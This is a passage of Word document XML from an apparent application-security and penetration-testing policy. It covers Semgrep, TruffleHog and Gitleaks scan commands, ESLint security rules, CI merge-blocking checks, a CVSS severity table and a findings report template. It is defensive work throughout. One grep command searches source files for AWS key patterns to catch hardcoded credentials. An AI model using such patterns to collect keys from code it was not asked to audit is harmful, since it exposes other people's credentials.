          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">pip3 install semgrep</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Run with OWASP rules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">semgrep --config=p/owasp-top-ten .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">semgrep --config=p/jwt .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">semgrep --config=p/secrets .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">semgrep --config=p/nodejs .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">semgrep --config=p/typescript .</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Run all security rulesets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">semgrep --config=auto --severity=ERROR --severity=WARNING .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Secret Detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># TruffleHog — scan git history for leaked secrets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">trufflehog git file://. --only-verified</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Gitleaks — scan current codebase and commit history</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">gitleaks detect --source . --verbose</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Check for hardcoded AWS credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -rn 'AKIA\|ASIA\|aws_secret\|aws_access' . \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  --include='*.ts' --include='*.js' --include='*.json' \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  --include='*.yaml' --include='*.env' \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  | grep -v node_modules | grep -v .git</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">ESLint Security Rules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Add to .eslintrc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  "plugins": ["security"],</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  "rules": {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    "security/detect-eval-with-expression": "error",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    "security/detect-non-literal-regexp": "warn",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    "security/detect-object-injection": "warn",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    "security/detect-possible-timing-attacks": "error",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    "no-eval": "error",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    "no-implied-eval": "error"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">CI/CD Integration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The following security checks must run on every pull request and block merge if they fail:</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800"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="360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Check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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Block on Failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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High/critical CVEs in dependencies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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npm audit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="46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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Hardcoded secrets in code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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Gitleaks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="46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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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OWASP Top 10 patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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Semgrep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="46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Yes — ERROR severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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TypeScript strict type check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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tsc --noEmit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="46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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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SAM template validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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sam validate --lint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="46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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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Medium CVEs in dependencies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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npm audit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="46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No — warn only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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Semgrep WARNING severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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Semgrep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="46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No — warn only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Pass Criteria</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Zero high or critical CVEs in production dependencies</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Zero hardcoded secrets in codebase or git history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Zero SAST findings at ERROR severity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TypeScript compiles clean in strict mode</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Findings Report Template</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Every penetration test engagement must produce a written findings report using this structure. Reports must be delivered within 5 business days of testing completion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding Classification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00"/>
        <w:gridCol w:w="1440"/>
        <w:gridCol w:w="6840"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="90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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="90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CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Remediation SLA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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9.0–10.0</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24–48 hours</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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Immediate production risk — data breach, full system compromise, service outage possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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7.0–8.9</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7 days</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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Significant risk — cross-tenant access, auth bypass, sensitive data exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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4.0–6.9</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30 days</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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Moderate risk — requires chained exploits or specific conditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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0.1–3.9</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90 days</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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Minimal risk — defense in depth, informational hardening</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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N/A</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Next release</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="68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Best practice recommendations, no exploitable vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Individual Finding Template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920"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="79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Content</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Finding ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="79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RC-PENTEST-{YEAR}-{NNN}</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Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="79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Short descriptive title</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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="79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Critical / High / Medium / Low / Informational</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CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="79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Calculated CVSS v3.1 base score</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CVSS Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="79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AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H (example)</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Affected Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="79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Lambda function name, API endpoint, DDB table, etc.</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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="79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Clear explanation of the vulnerability and how it was found</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Steps to Reproduce</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="79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Numbered steps — must be reproducible by the dev team</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Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="79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Screenshots, HTTP request/response, tool output</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Business Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="79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What an attacker could achieve if this were exploited</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Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="79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Specific technical fix — not generic advice</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References</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="79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CVE number, OWASP item, CWE identifier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="79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Open / In Progress / Resolved / Accepted Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Resolved Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="79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ISO date when fix was deployed and verified</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
